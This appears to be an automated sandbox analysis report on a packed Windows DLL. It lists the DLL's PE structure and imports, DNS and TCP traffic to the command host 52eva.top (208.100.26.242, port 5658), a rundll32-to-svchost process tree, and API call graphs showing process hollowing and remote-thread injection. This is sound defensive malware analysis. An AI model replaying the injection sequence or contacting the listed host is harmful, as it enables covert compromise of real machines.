jne 00007F912499929Ch
add edi, 04h
mov ecx, 00000000h
jmp 00007F91249992A8h
mov ecx, 00000001h
add edi, dword ptr [ebx]
add ebx, 04h
cmp dword ptr [ebx], 00000000h
je 00007F91249992C8h
add dword ptr [ebx], edx
mov esi, dword ptr [ebx]
add edi, dword ptr [ebx+04h]
push edi
push ecx
push edx
push ebx
push dword ptr [ebp-0000020Ah]
push dword ptr [ebp-0000020Eh]
mov edx, esi
Programming Language:
  • [ C ] VS98 (6.0) build 8168
  • [C++] VS98 (6.0) SP6 build 8804
  • [C++] VS98 (6.0) build 8168
  • [LNK] VS98 (6.0) imp/exp build 8168
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x83e66          0x3e          .nsp1
IMAGE_DIRECTORY_ENTRY_IMPORT          0x83380          0xa0          .nsp1
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x83000          0x288         .nsp1
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x83ea4          0x8           .nsp1
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name   Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type  Entropy            Characteristics
.nsp0  0x1000           0x82000       0x0       False     0                   empty      0.0                IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.nsp1  0x83000          0x55000       0x5469f   False     0.9981345387972548  data       7.998366920306635  IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.nsp2  0xd8000          0x1747        0x0       False     0                   empty      0.0                IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name        RVA      Size   Type  Language  Country
RT_VERSION  0x83058  0x230  data  Chinese   China
DLL           Import
KERNEL32.DLL  LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
USER32.DLL    DispatchMessageA
ADVAPI32.DLL  RegCloseKey
WS2_32.DLL    WSAStartup
SHLWAPI.DLL   PathFileExistsA
MSVCRT.DLL    ??3@YAXPAX@Z
SHELL32.DLL   SHGetSpecialFolderPathA
Name  Ordinal  Address
unll  1        0x10008e14
Language of compilation system  Country where language is spoken
Chinese                         China
Timestamp                 Protocol  SID      Message                                          Source Port  Dest Port  Source IP    Dest IP
11/03/22-12:35:13.698250  UDP       2023883  ET DNS Query to a *.top domain - Likely Hostile  56572        53         192.168.2.4  8.8.8.8
Timestamp                           Source Port  Dest Port  Source IP       Dest IP
Nov 3, 2022 12:35:14.111439943 CET  49695        5658       192.168.2.4     208.100.26.242
Nov 3, 2022 12:35:14.234112024 CET  5658         49695      208.100.26.242  192.168.2.4
Nov 3, 2022 12:35:14.234241962 CET  49695        5658       192.168.2.4     208.100.26.242
Nov 3, 2022 12:35:14.356290102 CET  5658         49695      208.100.26.242  192.168.2.4
Nov 3, 2022 12:35:14.356889009 CET  49695        5658       192.168.2.4     208.100.26.242
Nov 3, 2022 12:35:14.448417902 CET  49695        5658       192.168.2.4     208.100.26.242
Nov 3, 2022 12:35:14.570745945 CET  5658         49695      208.100.26.242  192.168.2.4
Timestamp                           Source Port  Dest Port  Source IP    Dest IP
Nov 3, 2022 12:35:13.698250055 CET  56572        53         192.168.2.4  8.8.8.8
Nov 3, 2022 12:35:14.096695900 CET  53           56572      8.8.8.8      192.168.2.4
Timestamp                           Source IP    Dest IP  Trans ID  OP Code             Name       Type            Class        DNS over HTTPS
Nov 3, 2022 12:35:13.698250055 CET  192.168.2.4  8.8.8.8  0xdf81    Standard query (0)  52eva.top  A (IP address)  IN (0x0001)  false
Timestamp                           Source IP  Dest IP      Trans ID  Reply Code    Name       CName  Address         Type            Class        DNS over HTTPS
Nov 3, 2022 12:35:14.096695900 CET  8.8.8.8    192.168.2.4  0xdf81    No error (0)  52eva.top         208.100.26.242  A (IP address)  IN (0x0001)  false


Target ID:0
Start time:12:35:08
Start date:03/11/2022
Path:C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):true
Commandline:loaddll32.exe "C:\Users\user\Desktop\5iiXyNVCQ3.dll"
Imagebase:0x1230000
File size:116736 bytes
MD5 hash:1F562FBF37040EC6C43C8D5EF619EA39
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Target ID:1
Start time:12:35:09
Start date:03/11/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7c72c0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:2
Start time:12:35:09
Start date:03/11/2022
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5iiXyNVCQ3.dll",#1
Imagebase:0xd90000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:3
Start time:12:35:09
Start date:03/11/2022
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe C:\Users\user\Desktop\5iiXyNVCQ3.dll,unll
Imagebase:0x1120000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:4
Start time:12:35:09
Start date:03/11/2022
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe "C:\Users\user\Desktop\5iiXyNVCQ3.dll",#1
Imagebase:0x1120000
File size:61952 bytes
MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:5
Start time:12:35:09
Start date:03/11/2022
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):false
Commandline:C:\WINDOWS\system32\svchost.exe -K NetworkService
Imagebase:0x12b0000
File size:44520 bytes
MD5 hash:FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:6
Start time:12:35:09
Start date:03/11/2022
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):false
Commandline:C:\WINDOWS\system32\svchost.exe -K NetworkService
Imagebase:0x12b0000
File size:44520 bytes
MD5 hash:FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:7
Start time:12:35:12
Start date:03/11/2022
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):true
Commandline:C:\WINDOWS\system32\svchost.exe -K NetworkService
Imagebase:0x12b0000
File size:44520 bytes
MD5 hash:FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Target ID:10
Start time:12:35:15
Start date:03/11/2022
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3144 -s 616
Imagebase:0xb50000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:12
Start time:12:35:17
Start date:03/11/2022
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 844
Imagebase:0xb50000
File size:434592 bytes
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language


    Execution Graph

    Execution Coverage:19.6%
    Dynamic/Decrypted Code Coverage:1.5%
    Signature Coverage:37.2%
    Total number of Nodes:779
    Total number of Limit Nodes:19
RtlAllocateHeap MessageBoxA 6180->6182 6181->6179 6181->6180 6183 10001697 6182->6183 6184 10003356 33 API calls 6183->6184 6185 1000171a 6184->6185 6186 10001753 CreateRemoteThreadEx 6185->6186 6186->6187 6187->6142 6189 10009531 6188->6189 6192 10009536 6188->6192 6195 10009360 6189->6195 6191 10009594 6191->6148 6192->6191 6193 10009430 4 API calls 6192->6193 6194 10009579 6193->6194 6194->6148 6196 10009370 6195->6196 6197 10009369 GetModuleHandleA 6195->6197 6196->6192 6197->6196 6200 100017b4 GetPEB 6198->6200 6201 100017c3 6200->6201 7145 1000b360 7146 1000b36d 7145->7146 7147 1000b381 7146->7147 7148 1000b373 FreeLibrary 7146->7148 7148->7146 7148->7147 7209 100099e0 7210 1000b740 2 API calls 7209->7210 7211 100099ee 7210->7211 7212 100099f5 ??3@YAXPAX 7211->7212 7213 100099fe 7211->7213 7212->7213 7226 100045fc 7227 10004633 7226->7227 7228 10005d6f 2 API calls 7227->7228 7229 1000464d 7228->7229 7230 10004786 CreateProcessA 7229->7230 7231 1000487e 7230->7231 7232 100049a4 GetThreadContext 7231->7232 7255 1000496f 7231->7255 7233 10004b18 7232->7233 7234 10009520 5 API calls 7233->7234 7235 10004bcb 7234->7235 7236 10004ccd 7235->7236 7237 10004cdf 7235->7237 7238 10005e5f 2 API calls 7236->7238 7239 10004d24 ReadProcessMemory 7237->7239 7238->7255 7240 10004d39 7239->7240 7241 10004d50 7240->7241 7242 10004d62 NtUnmapViewOfSection 7240->7242 7243 10005e5f 2 API calls 7241->7243 7244 10004d85 7242->7244 7243->7255 7245 10004db1 VirtualAllocEx 7244->7245 7246 10004d9f 7244->7246 7248 10004dfc 7245->7248 7247 10005e5f 2 API calls 7246->7247 7247->7255 7249 10004e16 7248->7249 7252 10004e28 7248->7252 7250 10005e5f 2 API calls 7249->7250 7250->7255 7251 10004e50 WriteProcessMemory 7253 10004e8f 7251->7253 7252->7251 7253->7253 7254 10005084 LocalSize 7253->7254 7277 1000509b 7254->7277 7256 100057c5 7257 1000580d WriteProcessMemory 7256->7257 7258 10005822 7257->7258 7259 10005884 SetThreadContext 7258->7259 7260 100059f8 7259->7260 7262 10009520 5 API calls 
7260->7262 7261 10005369 LocalSize 7261->7277 7263 10005aab 7262->7263 7264 10005b9c ResumeThread 7263->7264 7265 10005bc2 7264->7265 7266 10005bd9 WaitForSingleObject 7265->7266 7267 10005bfd 7265->7267 7266->7267 7267->7255 7268 10005c14 CloseHandle 7267->7268 7270 10005c43 CloseHandle 7268->7270 7271 10005c36 7268->7271 7269 100054d0 RtlMoveMemory 7269->7277 7270->7255 7271->7270 7272 10009520 GetModuleHandleA ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 7272->7277 7273 10005f47 2 API calls 7273->7277 7274 10005660 7275 10005e5f 2 API calls 7274->7275 7275->7255 7276 1000571b WriteProcessMemory 7276->7277 7277->7256 7277->7261 7277->7269 7277->7272 7277->7273 7277->7274 7277->7276 7278 1000579b VirtualProtectEx 7277->7278 7278->7277
    APIs
    • LocalSize.KERNEL32(00000000), ref: 1000372A
    • RtlMoveMemory.NTDLL(00000000,?), ref: 100039B0
    • LocalSize.KERNEL32(00000000), ref: 10003D81
    • RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 1000417F
    • LocalSize.KERNEL32(00000000), ref: 10004484
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: LocalSize$MemoryMove
    • String ID:
    • API String ID: 2329245388-0
    • Opcode ID: bead1b6c8d740f65976db46c7ef4eb727438f1c87399e36b62186f5f465c3754
    • Instruction ID: 6597548e417ce41973f24dc3fe005e763f74c0b4b92ccc5acbc8f0888a27e9fc
    • Opcode Fuzzy Hash: bead1b6c8d740f65976db46c7ef4eb727438f1c87399e36b62186f5f465c3754
    • Instruction Fuzzy Hash: 9163A4F5A812568BFB00CF58DCC1699B7F1FF69364B291471E846AB304D378B861DB22
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    APIs
    • GetModuleHandleA.KERNEL32(?,?,?,00000000,00000001,00000001), ref: 100019EE
    • NtAllocateVirtualMemory.NTDLL(FFFFFFFF,00000000,00000000,00000000,00001000,00000040), ref: 10001B1D
    • NtReadVirtualMemory.NTDLL(FFFFFFFF,00000000,00000000,00000000,?), ref: 10001B63
    • NtAllocateVirtualMemory.NTDLL(FFFFFFFF,00000000,00000000,?,00001000,00000040), ref: 10001BF9
    • NtFreeVirtualMemory.NTDLL(FFFFFFFF,00000000,?,00010000), ref: 10001CF0
    • NtFreeVirtualMemory.NTDLL(FFFFFFFF,00000000,?,00010000), ref: 10001D29
    • NtAllocateVirtualMemory.NTDLL(FFFFFFFF,00000000,00000000,00000000,00003000,00000040), ref: 10001DA9
    • NtFreeVirtualMemory.NTDLL(FFFFFFFF,00000000,?,00010000), ref: 10001E35
    • NtFreeVirtualMemory.NTDLL(FFFFFFFF,00000000,?,00010000), ref: 10001E78
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: MemoryVirtual$Free$Allocate$HandleModuleRead
    • String ID:
    • API String ID: 3626904461-0
    • Opcode ID: e41221d228e3099dbaa53f065df4f9fc7eb341e2a8ca2d0f562e219e06e247af
    • Instruction ID: 18045018c71ed80e37ca4e743997fd2e00c365ecd51ce7d830d4e4c8732093b4
    • Opcode Fuzzy Hash: e41221d228e3099dbaa53f065df4f9fc7eb341e2a8ca2d0f562e219e06e247af
    • Instruction Fuzzy Hash: 6D1249B1D10219ABFF40DFA4DC82BEEB7B9EB09390F105035F515B6285E771AA44CB62
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    APIs
    • GetModuleFileNameA.KERNEL32(000000FF), ref: 10001438
    • LoadLibraryA.KERNELBASE(?,?,?,10069CE3,?,?,?), ref: 10001589
    • CreateRemoteThreadEx.KERNELBASE(FFFFFFFF,00000000,00000000,1000753C,00000000,00000000,00000000,00000000), ref: 10001660
    • CreateRemoteThreadEx.KERNELBASE(FFFFFFFF,00000000,00000000,Function_00008E08,00000000,00000000,00000000,00000000), ref: 10001781
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: CreateRemoteThread$FileLibraryLoadModuleName
    • String ID: -K NetworkService
    • API String ID: 1086537905-2689450296
    • Opcode ID: b0c4e49a0226506626da4696a25d283b1a2ed37e453f38bc93039b9eaa77c593
    • Instruction ID: 192b5ded5049eacffa80d3a177baae0e671814ab7fcffe4313666e61edc3dd04
    • Opcode Fuzzy Hash: b0c4e49a0226506626da4696a25d283b1a2ed37e453f38bc93039b9eaa77c593
    • Instruction Fuzzy Hash: 07A121B5E10345ABFB40DFA0CCC2BEE76B9EB14780F104075F605BB286EA75AB149B51
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    APIs
    • CreateFileA.KERNELBASE(00000000,00000002,00000000,00000000,00000002,00000020,00000000), ref: 1000308D
    • WriteFile.KERNELBASE(00000000,10007715,00000000,?,00000000), ref: 1000324E
    • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,00000000,00000000,00000001,?,?,?,?,?,00000000), ref: 10003270
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: File$ChangeCloseCreateFindNotificationWrite
    • String ID:
    • API String ID: 3805958096-0
    • Opcode ID: 56f5217a5ff58419c402300fced1701773d6cbec5d636d564aa0362071dec691
    • Instruction ID: d20d66cfc10cbe3857bc80674b720ab49801aad87d9546e672d044fe8a3a2069
    • Opcode Fuzzy Hash: 56f5217a5ff58419c402300fced1701773d6cbec5d636d564aa0362071dec691
    • Instruction Fuzzy Hash: C0619AF5D00205AFFB41DFA4DC83BAF77B5EB09380F104075F645AB286E6756A448BA2
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    APIs
    • GetProcessHeap.KERNEL32(1000B517,00000008,00000002,00000000,10009825,00000007,00000003,?,?,1000261C,00000003,00000000,00000000,80000005,00000002,00000000), ref: 10009439
    • RtlAllocateHeap.NTDLL(1006A1D4,00000008,80000301), ref: 1000944D
    • MessageBoxA.USER32(00000000,10069FE8,10069FB4,00000010), ref: 10009466
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: Heap$AllocateMessageProcess
    • String ID:
    • API String ID: 2992861138-0
    • Opcode ID: 03d92ac7cbc8daedce1c15d98e9ff78b1ea41ed49775963adbdf35a54df7367f
    • Instruction ID: ca495d503fa8b24896a3a0ddeaa4d588f6ba14c0d85a12038cb70845f0cd2cd9
    • Opcode Fuzzy Hash: 03d92ac7cbc8daedce1c15d98e9ff78b1ea41ed49775963adbdf35a54df7367f
    • Instruction Fuzzy Hash: 59E0D8B56401317BF310FB609C49F8A7698DB057C1F014015FD05D6154E774D8018B71
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    APIs
    • PathIsDirectoryA.SHLWAPI(00000000), ref: 10002D72
    • PathIsDirectoryA.SHLWAPI(00000000), ref: 10002F46
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: DirectoryPath
    • String ID:
    • API String ID: 1580926078-0
    • Opcode ID: 952b3ee820ae0fce44b1993c9e55d840ad73d41c8d9cbaca60f6c06b9dd94f26
    • Instruction ID: 1ec6a9b9599abdcb0927499382ee2c56efe62a98ad550a515e2561b25c9f74a4
    • Opcode Fuzzy Hash: 952b3ee820ae0fce44b1993c9e55d840ad73d41c8d9cbaca60f6c06b9dd94f26
    • Instruction Fuzzy Hash: 368151B5E00206ABFB40DFA4DC82BBEB7B5EF193C0F140079E545F6249E771AA548762
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: a21b6345c22cde698bb8e6042296a18b9237ae50acfa973f10934829fa115130
    • Instruction ID: 6bd08ba5558e1723e664c623841c749a5d5f02c338c490c126332124de29b97e
    • Opcode Fuzzy Hash: a21b6345c22cde698bb8e6042296a18b9237ae50acfa973f10934829fa115130
    • Instruction Fuzzy Hash: 35B1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: 1999a4e140ade5994fbc139359fbd3a3e3541bf41f421a645fe8dc29bbbb4e7d
    • Instruction ID: a6a88fea8a15b71c93179c30403b5c246083cf119354f26f4d88da3cc7a861b2
    • Opcode Fuzzy Hash: 1999a4e140ade5994fbc139359fbd3a3e3541bf41f421a645fe8dc29bbbb4e7d
    • Instruction Fuzzy Hash: 56B1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: 21b147d3242dff41688a4e607ccc271381ba4f9bf2a3db1154b2a9a322427d62
    • Instruction ID: 18200786322e2296e48886ba80c3c0a0571579295a8a8f8cccfe2eafa6c45a37
    • Opcode Fuzzy Hash: 21b147d3242dff41688a4e607ccc271381ba4f9bf2a3db1154b2a9a322427d62
    • Instruction Fuzzy Hash: 33B1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: a8e977d5e6929cacd8ac213e15fadd063f0ff8242314a0019d4a04ef5fe6b589
    • Instruction ID: 2ab24672fad017e54084c68c726b6677777c2dd61183461ce3e7d2b956ec3b11
    • Opcode Fuzzy Hash: a8e977d5e6929cacd8ac213e15fadd063f0ff8242314a0019d4a04ef5fe6b589
    • Instruction Fuzzy Hash: 42B1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: 3dc280fe55abc01b58db292e390aabea07e0da105420eb392ee7620be3622837
    • Instruction ID: 4fc1348e7e92fee5a10d5f52c872e9f0b591b432bef915be5527e0563184c5c5
    • Opcode Fuzzy Hash: 3dc280fe55abc01b58db292e390aabea07e0da105420eb392ee7620be3622837
    • Instruction Fuzzy Hash: 85B1A8F1A402529BFF00CFA8DCC1B8977A5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: 62d3435ecaf67b690040494e715479c48cb913ef0c9a276450b22e2695167ed7
    • Instruction ID: ac85400423f5c659f8c14131d3889ba6e7c23d82175b45f4af381173e65af412
    • Opcode Fuzzy Hash: 62d3435ecaf67b690040494e715479c48cb913ef0c9a276450b22e2695167ed7
    • Instruction Fuzzy Hash: BCB1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    APIs
    • WSAStartup.WS2_32(?,00000000), ref: 10001148
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: Startup
    • String ID:
    • API String ID: 724789610-0
    • Opcode ID: 0b9b7ad6b27d15674f0398aaa48fba4813a74bb0a603e7b5ba06d62348bc4f8d
    • Instruction ID: d74f7e4fc3d2271a8ab4d4adfaa925da7f5db712bb5ec264062f05ece0e1d290
    • Opcode Fuzzy Hash: 0b9b7ad6b27d15674f0398aaa48fba4813a74bb0a603e7b5ba06d62348bc4f8d
    • Instruction Fuzzy Hash: 7C8184F6A402025BF740CB68DCC1BAA73E9EF583A4F290075E9059B345E679BD15C722
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 1000A7EE
    • strrchr.MSVCRT ref: 1000A817
    • RegOpenKeyA.ADVAPI32(00000000,00000000,?), ref: 1000A830
    • ??2@YAPAXI@Z.MSVCRT ref: 1000A853
    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00000400,?,?,?,00000698,00000000,00000000,00000000,?), ref: 1000A876
    • ??3@YAXPAX@Z.MSVCRT ref: 1000A884
    • ??2@YAPAXI@Z.MSVCRT ref: 1000A88E
    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,00000698,00000000,00000000,00000000), ref: 1000A8AB
    • ??3@YAXPAX@Z.MSVCRT ref: 1000A8DA
    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000698,00000000,00000000,00000000,?), ref: 1000A8E7
    • ??3@YAXPAX@Z.MSVCRT ref: 1000A8EE
    Memory Dump Source
    • Source File: 00000000.00000002.333039414.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
    Similarity
    • API ID: ??2@??3@$QueryValue$CloseOpenstrrchr
    • String ID:
    • API String ID: 1380196384-0
